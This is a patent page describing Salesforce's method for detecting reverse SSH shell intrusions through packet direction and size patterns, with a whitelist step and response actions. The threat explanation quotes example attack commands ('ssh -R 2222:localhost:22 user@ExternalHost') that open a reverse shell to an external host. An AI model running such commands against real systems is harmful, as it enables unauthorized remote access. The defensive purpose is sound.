+

US20170339166A1 - Reverse shell network intrusion detection - Google Patents

Reverse shell network intrusion detection Download PDF

Info

Publication number
US20170339166A1
US20170339166A1 US15/158,367 US201615158367A US2017339166A1 US 20170339166 A1 US20170339166 A1 US 20170339166A1 US 201615158367 A US201615158367 A US 201615158367A US 2017339166 A1 US2017339166 A1 US 2017339166A1
Authority
US
United States
Prior art keywords
packet
reverse
network
packets
shell
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
US15/158,367
Other versions
US10135847B2 (en
Inventor
John Brooke Althouse
William Roger Salusky
Jeffrey S. Atkinson
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Salesforce Inc
Original Assignee
Salesforce com Inc
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Salesforce com Inc filed Critical Salesforce com Inc
Priority to US15/158,367 priority Critical patent/US10135847B2/en
Assigned to SALESFORCE.COM, INC. reassignment SALESFORCE.COM, INC. ASSIGNMENT OF ASSIGNORS INTEREST (SEE DOCUMENT FOR DETAILS). Assignors: ALTHOUSE, JOHN BROOKE, ATKINSON, JEFFERY S., SALUSKY, WILLIAM
Publication of US20170339166A1 publication Critical patent/US20170339166A1/en
Application granted granted Critical
Publication of US10135847B2 publication Critical patent/US10135847B2/en
Assigned to SALESFORCE, INC. reassignment SALESFORCE, INC. CHANGE OF NAME (SEE DOCUMENT FOR DETAILS). Assignors: SALESFORCE.COM, INC.
Active legal-status Critical Current
Adjusted expiration legal-status Critical

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416Event detection, e.g. attack signature detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L1/00Arrangements for detecting or preventing errors in the information received
    • H04L1/12Arrangements for detecting or preventing errors in the information received by using return channel
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/02Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H04L63/0227Filtering policies
    • H04L63/0236Filtering by address, protocol, port number or service, e.g. IP-address or URL
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/42

Definitions

  • One or more implementations relate generally to packet-switched networking; and more specifically to detecting unauthorized access to a network resource from an external network.
  • a user of such a conventional system typically retrieves data from and stores data on the system using the user's own systems.
  • a user system might remotely access one of a plurality of server systems that might in turn access the database system.
  • Data retrieval from the system might include the issuance of a query from the user system to the database system.
  • the database system might process the request for information received in the query and send to the user system information relevant to the request.
  • the secure retrieval of accurate information and subsequent delivery of this information to the user system has been and continues to be a goal of administrators of database systems and other systems that may be deployed on one or more networks.
  • the server systems may be connected for communications over an external network such as the Internet. Accordingly, it is desirable to provide techniques to improve security of server systems, including database systems, to protect user's resources, for example, data and applications, without impeding authorized access to those resources over an external network.
  • mechanisms and methods for detecting unauthorized intrusion via an external network into a server system over a reverse secure shell connection can enable embodiments to provide improved security without impeding authorized access to the server system.
  • These mechanisms and methods for reverse shell network intrusion detection can enable embodiments to identify unauthorized devices or network locations that attempt access to the server system, and can stop an authorized transmission of information from the server system.
  • These mechanisms and methods for reverse shell network intrusion detection can be adapted in various embodiments for use in connection with various operating systems, networking environments and protocols within the scope of the present disclosure.
  • a method for reverse shell network intrusion detection includes monitoring packets in a secure shell session; determining a transmission direction and a payload size of each of the packets; analyzing the transmission directions and payload sizes of a first sequence of the packets relative to a predetermined pattern; based on the first sequence of packets matching the pattern, detecting a response transmitted from the client system to the foreign server; assessing a payload size of the response; and identifying the secure shell session as hosting a reverse shell session based on the response payload size exceeding a predetermined threshold.
  • embodiments and techniques are described with reference to an embodiment in which a method for reverse shell network intrusion detection is implemented in a system providing a front end for an on-demand database service capable of supporting multiple tenants, the one or more implementations and techniques are not limited to multi-tenant databases.
  • embodiments may be implemented on other computing systems such as laptop, a tablet, a PDA, a workstation, a mobile device, a network system such as a LAN, a WAN, etc.
  • embodiments may also be practiced using database architectures, such as ORACLE®, DB2® by IBM and the like without departing from the scope of the embodiments.
  • any of the embodiments described herein may be used alone or together with one another in any combination.
  • the one or more implementations encompassed within this specification may also include embodiments that are only partially mentioned or alluded to or are not mentioned or alluded to at all in this brief summary or in the abstract.
  • FIG. 1A shows a block diagram of an example environment in which an on-demand database service or other services may be provisioned over a network.
  • FIG. 1B shows a block diagram of example implementations of elements of FIG. 1A and example interconnections between these elements according to some implementations.
  • FIG. 2A shows a block diagram of a first example environment in which a method for reverse shell network intrusion detection can be used according to some implementations.
  • FIG. 2B shows a block diagram of a second example environment in which a method for reverse shell network intrusion detection can be used according to some implementations.
  • FIGS. 3A-3B illustrate operation of a first shell connection and a reverse shell connection over the first shell connection.
  • FIG. 4 shows an operational flow diagram illustrating a high level overview of a technique for reverse shell network intrusion detection in an embodiment.
  • FIG. 5 shows an operational flow diagram illustrating a high level overview of a whitelist feature of a technique for reverse shell network intrusion detection in an embodiment.
  • Some implementations described and referenced herein are directed to systems, apparatus, computer-implemented methods and computer-readable storage media for detecting a reverse shell connection into a client system from an external network.
  • FIG. 1A shows a block diagram of an example of an environment 10 in which an on-demand database service can be used in accordance with some implementations.
  • the environment 10 includes user systems 12 , a network 14 , a database system 16 (also referred to herein as a “cloud-based system”), a processor system 17 , an application platform 18 , a network interface 20 , tenant database 22 for storing tenant data 23 , system database 24 for storing system data 25 , program code 26 for implementing various functions of the system 16 , and process space 28 for executing database system processes and tenant-specific processes, such as running applications as part of an application hosting service.
  • environment 10 may not have all of these components or systems, or may have other components or systems instead of, or in addition to, those listed above.
  • the environment 10 is an environment in which an on-demand database service exists.
  • An on-demand database service such as that which can be implemented using the system 16 , is a service that is made available to users outside of the enterprise(s) that own, maintain or provide access to the system 16 . As described above, such users generally do not need to be concerned with building or maintaining the system 16 . Instead, resources provided by the system 16 may be available for such users' use when the users need services provided by the system 16 ; that is, on the demand of the users.
  • Application platform 18 can be a framework that allows the applications of system 16 to execute, such as the hardware or software infrastructure of the system 16 .
  • the application platform 18 enables the creation, management and execution of one or more applications.
  • Applications may be developed by the provider of the on-demand database service, by users accessing the on-demand database service via user systems 12 , or by third party application developers accessing the on-demand database service via user systems 12 .
  • the system 16 implements a web-based customer relationship management (CRM) system.
  • the system 16 includes application servers configured to implement and execute CRM software applications as well as provide related data, code, forms, renderable web pages and documents and other information to and from user systems 12 and to store to, and retrieve from, a database system related data, objects, and Web page content.
  • CRM customer relationship management
  • data for multiple tenants may be stored in the same physical database object in tenant database 22 .
  • tenant data is arranged in the storage medium(s) of tenant database 22 so that data of one tenant is kept logically separate from that of other tenants so that one tenant does not have access to another tenant's data, unless such data is expressly shared.
  • the system 16 also implements applications other than, or in addition to, a CRM application.
  • the system 16 can provide tenant access to multiple hosted (standard and custom) applications, including a CRM application.
  • User (or third party developer) applications which may or may not include CRM, may be supported by the application platform 18 .
  • the application platform 18 manages the creation and storage of the applications into one or more database objects and the execution of the applications in one or more virtual machines in the process space of the system 16 .
  • each system 16 may be configured to provide web pages, forms, applications, data and media content to user (client) systems 12 to support the access by user systems 12 as tenants of system 16 .
  • server is meant to refer to a computing device or system, including processing hardware and process space(s), an associated storage medium such as a memory device or database, and, in some instances, a database application (for example, OODBMS or RDBMS) as is well known in the art. It should also be understood that “server system” and “server” are often used interchangeably herein.
  • the database objects described herein can be implemented as part of a single database, a distributed database, a collection of distributed databases, a database with redundant online or offline backups or other redundancies, etc., and can include a distributed database or storage network and associated processing intelligence.
  • the network 14 can be or include any network or combination of networks of systems or devices that communicate with one another.
  • the network 14 can be or include any one or any combination of a LAN (local area network), WAN (wide area network), telephone network, wireless network, cellular network, point-to-point network, star network, token ring network, hub network, or other appropriate configuration.
  • the network 14 can include a TCP/IP (Transfer Control Protocol and Internet Protocol) network, such as the global internetwork of networks often referred to as the “Internet” (with a capital “I”).
  • the Internet will be used in many of the examples herein. However, it should be understood that the networks that the disclosed implementations can use are not so limited, although TCP/IP is a frequently implemented protocol.
  • the user systems 12 can communicate with system 16 using TCP/IP and, at a higher network level, other common Internet protocols to communicate, such as HTTP, FTP, AFS, WAP, etc.
  • each user system 12 can include an HTTP client commonly referred to as a “web browser” or simply a “browser” for sending and receiving HTTP signals to and from an HTTP server of the system 16 .
  • HTTP server can be implemented as the sole network interface 20 between the system 16 and the network 14 , but other techniques can be used in addition to or instead of these techniques.
  • the network interface 20 between the system 16 and the network 14 includes load sharing functionality, such as round-robin HTTP request distributors to balance loads and distribute incoming HTTP requests evenly over a number of servers.
  • each of the servers can have access to the MTS data, however, other alternative configurations may be used instead.
  • the user systems 12 can be implemented as any computing device(s) or other data processing apparatus or systems usable by users to access the database system 16 .
  • any of user systems 12 can be a desktop computer, a work station, a laptop computer, a tablet computer, a handheld computing device, a wearable device, a mobile cellular phone (for example, a “smartphone”), or any other Wi-Fi-enabled device, wireless access protocol (WAP)-enabled device, or other computing device capable of interfacing directly or indirectly to the Internet or other network.
  • WAP wireless access protocol
  • each user system 12 typically executes an HTTP client, for example, a web browsing (or simply “browsing”) program, such as a web browser based on the WebKit platform, Microsoft's Internet Explorer browser, Netscape's Navigator browser, Opera's browser, Mozilla's Firefox browser, or a WAP-enabled browser in the case of a cellular phone, PDA or other wireless device, or the like, allowing a user (for example, a subscriber of on-demand services provided by the system 16 ) of the user system 12 to access, process and view information, pages and applications available to it from the system 16 over the network 14 .
  • a web browsing or simply “browsing” program
  • each user system 12 and some or all of its components are operator-configurable using applications, such as a browser, including computer code executed using a central processing unit (CPU) such as an Intel Pentium® processor or the like.
  • a central processing unit such as an Intel Pentium® processor or the like.
  • the system 16 (and additional instances of an MTS, where more than one is present) and all of its components can be operator-configurable using application(s) including computer code to run using the processor system 17 , which may be implemented to include a CPU, which may include an Intel Pentium® processor or the like, or multiple CPUs.
  • the system 16 includes tangible computer-readable media having non-transitory instructions stored thereon/in that are executable by or used to program a server or other computing system (or collection of such servers or computing systems) to perform some of the implementation of processes described herein.
  • computer program code 26 can implement instructions for operating and configuring the system 16 to intercommunicate and to process web pages, applications and other data and media content as described herein.
  • the computer code 26 can be downloadable and stored on a hard disk, but the entire program code, or portions thereof, also can be stored in any other volatile or non-volatile memory medium or device as is well known, such as a ROM or RAM, or provided on any media capable of storing program code, such as any type of rotating media including floppy disks, optical discs, digital versatile disks (DVD), compact disks (CD), microdrives, and magneto-optical disks, and magnetic or optical cards, nanosystems (including molecular memory ICs), or any other type of computer-readable medium or device suitable for storing instructions or data.
  • any other volatile or non-volatile memory medium or device such as a ROM or RAM
  • any media capable of storing program code such as any type of rotating media including floppy disks, optical discs, digital versatile disks (DVD), compact disks (CD), microdrives, and magneto-optical disks, and magnetic or optical cards, nanosystems (including molecular memory ICs), or any other type
  • program code may be transmitted and downloaded from a software source over a transmission medium, for example, over the Internet, or from another server, as is well known, or transmitted over any other existing network connection as is well known (for example, extranet, VPN, LAN, etc.) using any communication medium and protocols (for example, TCP/IP, HTTP, HTTPS, Ethernet, etc.) as are well known.
  • computer code for the disclosed implementations can be realized in any programming language that can be executed on a server or other computing system such as, for example, C, C++, HTML, any other markup language, JavaTM, JavaScript, ActiveX, any other scripting language, such as VBScript, and many other programming languages as are well known may be used.
  • JavaTM is a trademark of Sun Microsystems, Inc.
  • FIG. 1B shows a block diagram of example implementations of elements of FIG. 1A and example interconnections between these elements according to some implementations. That is, FIG. 1B also illustrates environment 10 , but FIG. 1B , various elements of the system 16 and various interconnections between such elements are shown with more specificity according to some more specific implementations.
  • the user system 12 includes a processor system 12 A, a memory system 12 B, an input system 12 C, and an output system 12 D.
  • the processor system 12 A can include any suitable combination of one or more processors.
  • the memory system 12 B can include any suitable combination of one or more memory devices.
  • the input system 12 C can include any suitable combination of input devices, such as one or more touchscreen interfaces, keyboards, mice, trackballs, scanners, cameras, or interfaces to networks.
  • the output system 12 D can include any suitable combination of output devices, such as one or more display devices, printers, or interfaces to networks.
  • the network interface 20 is implemented as a set of HTTP application servers 100 1 - 100 N .
  • Each application server 100 also referred to herein as an “app server”, is configured to communicate with tenant database 22 and the tenant data 23 therein, as well as system database 24 and the system data 25 therein, to serve requests received from the user systems 12 .
  • the tenant data 23 can be divided into individual tenant storage spaces 112 , which can be physically or logically arranged or divided.
  • user storage 114 and application metadata 116 can similarly be allocated for each user. For example, a copy of a user's most recently used (MRU) items can be stored to user storage 114 . Similarly, a copy of MRU items for an entire organization that is a tenant can be stored to tenant storage space 112 .
  • MRU most recently used
  • the system 16 of FIG. 1B also includes a user interface (UI) 30 and an application programming interface (API) 32 to system 16 resident processes to users or developers at user systems 12 .
  • UI user interface
  • API application programming interface
  • the environment 10 may not have the same elements as those listed above or may have other elements instead of, or in addition to, those listed above.
  • Each application server 100 can be communicably coupled with tenant database 22 and system database 24 , for example, having access to tenant data 23 and system data 25 , respectively, via a different network connection.
  • one application server 100 1 can be coupled via the network 14 (for example, the Internet)
  • another application server 100 N-1 can be coupled via a direct network link
  • another application server 100 N can be coupled by yet a different network connection.
  • Transfer Control Protocol and Internet Protocol are examples of typical protocols that can be used for communicating between application servers 100 and the system 16 .
  • TCP/IP Transfer Control Protocol and Internet Protocol
  • each application server 100 is configured to handle requests for any user associated with any organization that is a tenant of the system 16 . Because it can be desirable to be able to add and remove application servers 100 from the server pool at any time and for various reasons, in some implementations there is no server affinity for a user or organization to a specific application server 100 .
  • an interface system implementing a load balancing function (for example, an F5 Big-IP load balancer) is communicably coupled between the application servers 100 and the user systems 12 to distribute requests to the application servers 100 .
  • the load balancer uses a least-connections algorithm to route user requests to the application servers 100 .
  • system 16 can be a multi-tenant system in which system 16 handles storage of, and access to, different objects, data and applications across disparate users and organizations.
  • one tenant can be a company that employs a sales force where each salesperson uses system 16 to manage aspects of their sales.
  • a user can maintain contact data, leads data, customer follow-up data, performance data, goals and progress data, etc., all applicable to that user's personal sales process (for example, in tenant database 22 ).
  • tenant database 22 for example, in tenant database 22 .
  • the user can manage his or her sales efforts and cycles from any of many different user systems. For example, when a salesperson is visiting a customer and the customer has Internet access in their lobby, the salesperson can obtain critical updates regarding that customer while waiting for the customer to arrive in the lobby.
  • the user systems 12 (which also can be client systems) communicate with the application servers 100 to request and update system-level and tenant-level data from the system 16 .
  • Such requests and updates can involve sending one or more queries to tenant database 22 or system database 24 .
  • the system 16 (for example, an application server 100 in the system 16 ) can automatically generate one or more SQL statements (for example, one or more SQL queries) designed to access the desired information.
  • System database 24 can generate query plans to access the requested data from the database.
  • the term “query plan” generally refers to one or more operations used to access information in a database system.
  • Each database can generally be viewed as a collection of objects, such as a set of logical tables, containing data fitted into predefined or customizable categories.
  • a “table” is one representation of a data object, and may be used herein to simplify the conceptual description of objects and custom objects according to some implementations. It should be understood that “table” and “object” may be used interchangeably herein.
  • Each table generally contains one or more data categories logically arranged as columns or fields in a viewable schema. Each row or element of a table can contain an instance of data for each category defined by the fields.
  • a CRM database can include a table that describes a customer with fields for basic contact information such as name, address, phone number, fax number, etc.
  • Another table can describe a purchase order, including fields for information such as customer, product, sale price, date, etc.
  • standard entity tables can be provided for use by all tenants.
  • such standard entities can include tables for case, account, contact, lead, and opportunity data objects, each containing pre-defined fields.
  • entity also may be used interchangeably with “object” and “table.”
  • tenants are allowed to create and store custom objects, or may be allowed to customize standard entities or objects, for example by creating custom fields for standard objects, including custom index fields.
  • custom objects Commonly assigned U.S. Pat. No. 7,779,039, titled CUSTOM ENTITIES AND FIELDS IN A MULTI-TENANT DATABASE SYSTEM, by Weissman et al., issued on Aug. 17, 2010, and hereby incorporated by reference in its entirety and for all purposes, teaches systems and methods for creating custom objects as well as customizing standard objects in a multi-tenant database system.
  • all custom entity data rows are stored in a single multi-tenant physical table, which may contain multiple logical tables per organization. It is transparent to customers that their multiple “tables” are in fact stored in one large table or that their data may be stored in the same table as the data of other customers.
  • Messages or tasks may involve a wide range of activities; for example, generating monthly sales reports or updating the contact information for a list of clients, just to name a few.
  • Message queue provides a system to queue, schedule and execute these messages in an asynchronous manner. That is, the tenant submitting the message need not wait for the execution and completion of the message.
  • a message “sender” can send a message into the messaging system, and then proceed to other tasks without having to wait for a reply. Similarly, a receiver may receive the message at a later time without direct interaction with the sender.
  • some messages may be processed by a “message broker” which is an entity responsible for receiving the message, holding it until delivery, and delivering it to the appropriate receiver(s).
  • a “message broker” which is an entity responsible for receiving the message, holding it until delivery, and delivering it to the appropriate receiver(s).
  • Various messaging protocols may be used.
  • One example is an open standard application layer protocol called the Advanced Message Queuing Protocol (AMQP), wire-level protocol.
  • AMQP Advanced Message Queuing Protocol
  • Apache QpidTM among others provide messaging tools that implement the AMQP protocol.
  • Qpid pronounced “Cupid” herein to mean any messaging protocol or system.
  • a client system 200 represents any server, server system or the like.
  • the client system 200 may be coupled to a network or it may include a network.
  • this environment we will show how embodiments of the present disclosure can be used to detect a reverse shell connection or “intrusion” into the client system from a foreign system, meaning one that is outside of the internal network 150 .
  • intrusion may imply an unauthorized connection, we also describe below how authorized connections also may be detected and permitted to operate.
  • the internal network 150 may be of any size; it may comprise only a single server or computer (we use the terms interchangeably) or many of them.
  • the internal network may correspond to a system such as system 16 illustrated in FIGS. 1A-1B .
  • embodiments of the present disclosure may be used to help protect a system like such as a cloud-based database system 16 , or other systems, from unauthorized intrusions.
  • the internal network 150 may be coupled via connection 210 to a network 14 .
  • the client system 200 may provide a network interface/Internet software layer 20 for connection to the network 14 .
  • the connection 210 may be a packet-switched network connection, enables by a network interface/Internet software layer 208 .
  • a transport layer and optional firewall 206 may be operatively coupled to the network layer 208 , details of which are well known.
  • a “shell” is originally a UNIX term for an interactive user interface for interaction with an operating system.
  • a shell is the layer of programming that understands and executes commands entered by a user, for example, through a keyboard or text console.
  • the shell is called a command interpreter.
  • a shell usually implies an interface with a command syntax.
  • a login shell is the first process that executes under a user ID for a typical interactive session on a server.
  • a shell program deployed in the client system 200 .
  • a shell may comprise a shell client portion 202 which is the part that interacts with user inputs.
  • a shell server portion 204 “listens” to the lower level software layers 206 to detect and respond to an incoming shell session request. The incoming request may be coming from a shell client outside the system 200 for example, via the network 14 as explained in more detail below.
  • SSH Secure Shell
  • SSH Secure Shell
  • SSH Secure Socket Shell
  • the UNIX SSH program is just one example.
  • the name “ssh” (lower case) refers to an OpenSSH client (remote login program) in the OpenBSD manual pages.
  • Linux shell implementations among others.
  • SSH provides a secure channel over an unsecured network in a client-server architecture, connecting an SSH client application with an SSH server.
  • Common applications include remote command-line login and remote command execution. The problem is that remote command execution may be used by an unauthorized person or machine to access resources or data on a client system such as system 200 , or any other resource on internal network 150 .
  • a “foreign system” 220 is illustrated and connected via 240 to the network 14 .
  • the term “foreign system” in this context means any system outside of the internal network 150 ; it does not imply any physical location.
  • the foreign system 220 may comprise a network interface 230 , transport layer/firewall 228 , etc. similar to the client system 200 .
  • the general description of the client system 200 and internal network 150 are applicable to the foreign system 220 and external network 160 , respectively.
  • a shell client component 224 and a shell server component 226 are deployed.
  • FIG. 3A illustrates operation of shell connections in more detail.
  • an “exploit script” 326 has been stored in the client system 200 .
  • a script may be inserted into a client system through various means, for example, by physical connection of a storage device that contains the script to the client system 200 , directly or via the internal network.
  • an exploit (or “malicious”) script may arrive via an email or it may be downloaded (intentionally or inadvertently) from a web site.
  • the exploit script may cause the shell client component 322 to initiate a shell connection, for example, over a network ( 14 in FIG. 2B ), to a foreign system 220 .
  • the shell client reaches out to an external system by executing a shell command which may be of the form “ssh -R 2222:localhost:22 user@ExternalHost.”
  • the “ssh” part instructs starting the shell client program.
  • Various parameters may be appended, for example, see the OpenBSD manual pages for details, available at http://openbsd.org.
  • “-R” option indicates destination address, here 2222:localhost:22 and then “user@hostname.”
  • the destination address (of the foreign system) is specified in the exploit script.
  • the shell client 322 transmits a message 336 to the specified address to login to the remote machine; here, the message is received by a shell server component 332 running on the foreign system 220 .
  • the connection is bidirectional, enabling the shell server 332 to respond to packets it receives, for example, by sending an echo of a received character and/or an acknowledgement (ACK) packet 340 .
  • ACK acknowledgement
  • the specific protocols will depend on the operating systems in use. Some examples are given below.
  • the forward shell connection 350 is considered secure in that traffic over it will be encrypted.
  • the forward shell connection 350 has been established.
  • the shell client component 334 on the foreign system initiates a shell connection in the reverse direction, i.e., from the foreign system back into the client system.
  • the shell client sends a command to open a shell session, but it sends that command over the already open forward connection 350 .
  • the reverse connection is not detected by a typical firewall or similar component, because there is no new connection—the reverse connection is operating over the already established forward connection 350 .
  • the foreign system (shell client 334 ) sends a command such as “SSH -p 2222 user@localhost, indicated by solid arrow 360 , which is received by the shell server component 324 on the client system 200 .
  • This enables the foreign system to establish a (reverse) shell connection and execute commands as if it was on the same network, namely internal network 150 .
  • the -p parameter specifies the port ( 2222 ) to connect to on the remote host, in this case the client system 200 , which is the same port as the forward connection already in use. In this way, the reverse connection utilizes the extant forward connection.
  • the shell server 324 may send a reply over the reverse connection, indicated at dashed line 362 .
  • the reply may comprise an echo of a received character, and in some cases an ACK packet, as further explained below.
  • This reverse shell connection enables the foreign system (or a user of the foreign system), manually or programmatically, to execute shell level commands to explore the file structure, learn what resources and data are on the client system, or available to it, and potentially to obtain copies or download such resources and data. For example, the foreign system may gain access to tenant data storage in a cloud-based database system of the type illustrated in FIGS. 1A-1B .
  • the reverse connection escapes notice by a typical firewall 206 or the like, because it utilizes the already existing connection 350 which originated from the client system inside the internal network.
  • a network intrusion detection system (“NIDS”) 250 may be implemented, for example, on a server system.
  • the NIDS 250 may be coupled to via 213 (by cable, wireless, induction, or any other means) so as to monitor packet data traffic via 210 , in other words, traffic between the client system 200 and a network 14 , which may in turn pass traffic to and from the foreign system 220 .
  • the NIDS 250 is configured to inspect individual packets, read header data, determine payload size, and ascertain other parameters on a per packet basis.
  • the NIDS is configured to detect reverse shell connections, i.e. shell sessions in which an external or foreign system such as foreign system 220 is sending shell commands to the client system 200 over a forward shell connection that originated at the client system.
  • FIG. 2B illustrates an alternative embodiment in which an NIDS 280 is deployed in the client system 200 .
  • the NIDS 280 has essentially the same functionality as the external NIDS 250 in FIG. 2A .
  • the NIDS may be implemented in a network traffic analyzer.
  • Bro is one example of a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. Bro provides users with a domain-specific scripting language for expressing arbitrary analysis tasks. It terms of deployment, Bro and similar products are commercially available and configurable to run on commodity hardware on standard UNIX-style operating systems (including Linux, FreeBSD, and MacOS). The Bro scripting language may indeed be utilized for intrusion detection, as explained below.
  • FIG. 2A shows a detection script 270 , which may be a Bro script in some embodiments, arranged for execution on the NIDS 250 .
  • FIG. 4 shows an operational flow diagram 400 illustrating a high level overview of a process for reverse shell network intrusion detection in one embodiment.
  • a process such as 400 preferably is implemented in software. It may be implemented in a Bro script, in some embodiments, as shown below.
  • the process watches for a secure shell connection, decision block 404 . It loops until a shell connection is detected, and the proceeds to capture a traffic packet, process block 406 .
  • the term “capture” here refers to passively inspecting a packet, not removing it from the network or even modifying it.
  • the process determines whether the direction of the packet is from a shell server to a shell client, decision block 410 .
  • the process loops via path 412 back to capture a next packet at block 406 . It can be appreciated that this process must be fast enough to inspect packets in real time, if it is to provide real-time network intrusion protection.
  • packet traffic may be recorded, and analyzed after the fact, to determine whether or not an intrusion occurred.
  • This process may be related, although it is not limited to, the scenario in FIG. 3B . That is, the process 400 “watches” for a shell connection ( 350 in FIG. 3B ), and then analyzes packet traffic ( 360 , 362 in FIG. 3B ) over the shell connection to detect a reverse shell connection, as follows.
  • the process next determines whether the packet size is equal to a particular value (integer “M” bytes) at decision block 414 . Packet size is explained below. If the first packet is not size M, the process loops via 416 back to block 406 to inspect a next packet. If the first packet is size M (“YES” path), the process captures the next packet, block 418 . The process loops if necessary to wait for the next packet in the current sequence of packets.
  • the “current sequence” refers to packet traffic over the shell connection detected at 404 ; other packets may be ignored for present purposes.
  • the process 400 then inspects the next (second) packet to determine, at decision block 420 , whether the direction of this packet is from shell client to shell server, in other words, opposite to the direction of the first packet. If not, the process loops back via 422 to block 406 to essentially re-start looking for a particular sequence of packets as described here.
  • the process continues to determine, at decision block 424 , whether the second packet size equals M.
  • the process loops back via 426 again to block 406 . If it is size M, the process continues to block 430 to capture a next packet. If the next packet is not an ACK, decision block 432 , the process again loops back via 434 (- 426 - 422 - 416 - 412 ) to block 406 .
  • a first packet must have a given direction and specified size, and it must be followed by a next (second) packet having a direction opposite to the first given direction, and also have the same specified size (M), and the next (third) packet must be an ACK packet.
  • next packet we use the term “next packet” to mean a subsequent packet following a first packet in a sequence of packets, with no packet intervening between the first packet and the subsequent packet in the same sequence.
  • the process increments a character count, block 438 .
  • This count reflects the number of characters, so far, successfully sent (in succession) from the shell server to the shell client.
  • Decision block 439 tests whether the count equals or exceeds predetermined threshold, for example, two or three characters. This concept may be expanded to recognize variations and options appended to shell commands, which may make them longer than two or three characters. If the threshold character count is not met at 439 , the process 400 continues back to block 406 to capture and inspect subsequent packets.
  • the process captures a next packet, block 440 , tests the direction of that packet, decision 441 , and if the packet is in the direction client to server (“YES”), it next tests whether the packet size exceeds a predetermined size R, decision block 442 .
  • R is a selected integer reflecting a packet size, for example, in bytes, that exceeds the size of a single character packet (for example, M). This is to determine whether the current packet is likely to be a response (by the client) to a shell command (from the shell server). Responsive to a determination at 442 that the packet size is not greater than R, the process loops back via path 444 to block 406 .
  • the process Responsive to a determination at 442 that the packet size is greater than R, the process indicates or reports the detection of a reverse shell connection at block 450 , and then exit or return, block 460 . Various actions may be taken in response to the detection, some of which are described later.
  • the process 400 detects a reverse shell connection based on a packet sequence of:
  • the exchange may send the letter “l” from the shell server to the shell client.
  • the size M may be 96 bytes, for reasons explained below.
  • the client echoes back the letter “l”, and the client follows that echo with an ACK packet.
  • the server may send the character “s”- and again the client echoes that back, plus an ACK packet.
  • a larger packet follows.
  • the shell command “ls” (list files) was sent from the shell server, and the response, namely a list of files in the current directory on the client system, will almost certainly have a size greater than a single character. So R should be set to be an integer greater than M.
  • Some shell commands are greater than two characters long, for example, “cat” (show content of file). In such cases, the above sequence will be repeated three times, reflecting the three-character command, with each one echoed and acknowledged.
  • Process 400 illustrates just one example or embodiment of this process; it will vary for different network protocols, shell programs, operating systems, etc. Some other examples are illustrated by the following sample scripts.
  • FIG. 5 illustrates a process to essentially ignore reverse shell connections by previously authorized users or hosts. This may be done, in some embodiments, by the use of a “whitelist” of system addresses that are authorized to utilize reverse shell access.
  • a process 500 waits for, or is triggered by, detection of a reverse shell connection, block 510 .
  • block 450 of the process 400 may incorporate or link to the process 500 .
  • the process identifies the location or address of the foreign system that is using the reverse connection.
  • an NIDS or a script such as those above executable on an NIDS can provide this information.
  • the foreign system address may be compared to a preexisting list of permitted or authorized addresses on a whitelist, decision block 514 . If the address is on the authorized list, the process may loop via path 515 to standby mode. If the address is not on the authorized list, the process 500 may continue to identify the current shell as hosting a reverse shell session.
  • hosting in the sense of the reverse session utilizing an existing shell session that originated at a client system such as discussed above with regard to FIG. 3B .
  • the process 500 may include taking a predetermined action comprising, for example, one or more of a set of actions that may include (a) sending a notification to a predetermined destination, (b) sending a reset command over the network to terminate the shell session, (c) logging the reverse shell session including an identifier of the foreign server, or (d) executing an intrusion script to take other actions.
  • a predetermined action comprising, for example, one or more of a set of actions that may include (a) sending a notification to a predetermined destination, (b) sending a reset command over the network to terminate the shell session, (c) logging the reverse shell session including an identifier of the foreign server, or (d) executing an intrusion script to take other actions.

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer And Data Communications (AREA)

Abstract

A client system such as a database system may be vulnerable to intrusion by an unauthorized user or system through a reverse secure shell connection that enables the intruder to execute OS-level or shell commands on the client system. A reverse shell connection may be detected by monitoring and inspecting packet data traffic between the client system or internal network, and an exterior or “foreign” network. In one example of such a process, after detecting a normal shell session originating inside the internal network, a reverse shell connection exploiting the initial shell detection is detected by analyzing the transmission directions and payload sizes of a sequence of the monitored packets relative to a predetermined traffic pattern. The specific pattern may be selected for different operating systems.

Description

    COPYRIGHT NOTICE
  • A portion of the disclosure of this patent document contains material which is subject to copyright protection. The copyright owner has no objection to the facsimile reproduction by anyone of the patent document or the patent disclosure, as it appears in the Patent and Trademark Office patent file or records, but otherwise reserves all copyright rights whatsoever.
